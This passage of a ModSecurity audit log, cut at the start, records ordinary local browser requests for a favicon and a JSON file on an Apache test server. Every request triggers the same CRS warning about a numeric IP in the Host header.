[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIoAAAAF\"]"],"stopwatch":{"p1":417,"p2":1153,"p3":51,"p4":291,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIsAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIsAAAAF\"]"],"stopwatch":{"p1":410,"p2":939,"p3":47,"p4":394,"p5":49,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RIAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RIAAAAB\"]"],"stopwatch":{"p1":462,"p2":963,"p3":44,"p4":260,"p5":59,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RMAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RMAAAAB\"]"],"stopwatch":{"p1":502,"p2":891,"p3":47,"p4":252,"p5":53,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:04 --0400","transaction_id":"WRcIuH8AAQEAAAkW4RQAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:22:58 GMT","ETag":"\"21-54f67b8770b5d\"","Accept-Ranges":"bytes","Content-Length":"33","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcIuH8AAQEAAAkW4RQAAAAB\"]"],"stopwatch":{"p1":392,"p2":1541,"p3":90,"p4":207,"p5":90,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs98AAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:34:58 GMT","ETag":"\"65-54f67e363bf86\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLhn8AAQEAAAkXs98AAAAC\"]"],"stopwatch":{"p1":732,"p2":1341,"p3":166,"p4":160,"p5":63,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@AAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@AAAAAC\"]"],"stopwatch":{"p1":391,"p2":881,"p3":47,"p4":373,"p5":54,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@EAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@EAAAAC\"]"],"stopwatch":{"p1":485,"p2":941,"p3":44,"p4":241,"p5":51,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:51 --0400","transaction_id":"WRcLt38AAQEAAAkYuEMAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:34:58 GMT","If-None-Match":"\"65-54f67e363bf86\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:35:49 GMT","ETag":"\"65-54f67e66856bf\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLt38AAQEAAAkYuEMAAAAD\"]"],"stopwatch":{"p1":455,"p2":1109,"p3":131,"p4":232,"p5":55,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEQAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEQAAAAD\"]"],"stopwatch":{"p1":378,"p2":800,"p3":147,"p4":250,"p5":50,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
